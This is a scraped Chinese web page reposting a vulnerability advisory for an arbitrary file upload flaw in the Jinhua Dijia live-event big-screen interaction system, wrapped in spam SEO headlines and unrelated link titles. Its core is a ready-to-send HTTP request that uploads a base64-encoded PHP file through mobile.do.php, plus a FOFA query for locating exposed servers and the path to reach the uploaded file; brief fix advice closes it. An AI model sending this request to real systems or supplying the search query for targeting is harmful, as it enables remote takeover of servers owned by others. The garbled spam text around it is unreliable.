当前位置: 首页 > news >正文

用织梦做的网站怎么上传虚拟茂名seo快速排名外包

用织梦做的网站怎么上传虚拟,茂名seo快速排名外包,云南哪有网站建设报价的,外包网站建设哪家好0x01 产品描述: ‌ 金华迪加现场大屏互动系统‌是由金华迪加网络科技有限公司开发的一款专注于增强活动现场互动性的系统。该系统设计用于提供高质量的现场互动体验,支持各种大型活动,如企业年会、产品发布会、展览展示等。其主要功能包…

0x01 产品描述:

 ‌       金华迪加现场大屏互动系统‌是由金华迪加网络科技有限公司开发的一款专注于增强活动现场互动性的系统。该系统设计用于提供高质量的现场互动体验,支持各种大型活动,如企业年会、产品发布会、展览展示等。其主要功能包括实时互动、数据展示、现场控制等,能够显著提升活动的互动性和参与度‌。
0x02 漏洞描述:

        金华迪加现场大屏互动系统在mobile.do.php接口处存在任意文件上传,攻击者可通过该漏洞在上传任意文件至服务器上从而实现远程接管。
0x03 搜索语句:

Fofa:body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"


0x04 漏洞复现:

POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: closefiletype=php&imgbase64=PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4=

拼接上传路径进行访问:

https://your-ip/data/pic/回显地址


0x05 修复建议:

        首先确保系统限制了文件所必须的上传后缀,然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串,同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。

http://www.shuangfujiaoyu.com/news/43977.html

相关文章:

  • 网站推广临沂seo推广培训课程
  • 阿里云搭建网站多少钱百度ai营销中国行
  • 网站是干嘛用的免费平台
  • 济南的企业网站建设品牌策划是做什么的
  • 青岛北京网站建设公司百度论坛首页官网
  • 表白网站制作代码怎么样建一个网站
  • 那些市区做网站群手机如何建网站
  • 写作网站大全合肥seo网站管理
  • 电商会学着做网站呢百度图片搜索网页版
  • 天津智能网站建设价位百度网址大全
  • ui素材网站违禁网站用什么浏览器
  • 大型网站解决方案设计百度竞价推广技巧
  • 网站首次打开速度慢wordpress网页游戏推广平台
  • 网站推广外包公司广东省各城市疫情搜索高峰进度
  • 想在公司局域网做建网站综合型b2b电子商务平台网站
  • 岳阳市 网站建设谷歌seo引擎优化
  • 做网站的目的最新网站查询工具
  • 虚拟服务器建网站一个万能的营销方案
  • 网站url改版清远今日头条最新消息
  • 宜家设计装修怎么收费排名优化网站seo排名
  • 网站建议怎么写每日精选12条新闻
  • 网站建设策略电脑培训班电脑培训学校
  • 陇南市武都区住房和城乡建设网站seo网上培训
  • 电商网站建设策划百度pc端首页
  • 做网站的工作怎么样晚上看b站
  • 餐饮公司做网站好处百度竞价员
  • 做企业网站开发哪家好网站网络营销
  • 成都网站建设 四川冠辰科技公司全国新冠疫苗接种率
  • div css网站布局百度投诉中心24人工
  • 衡水网站建设的地方广东广州疫情最新情况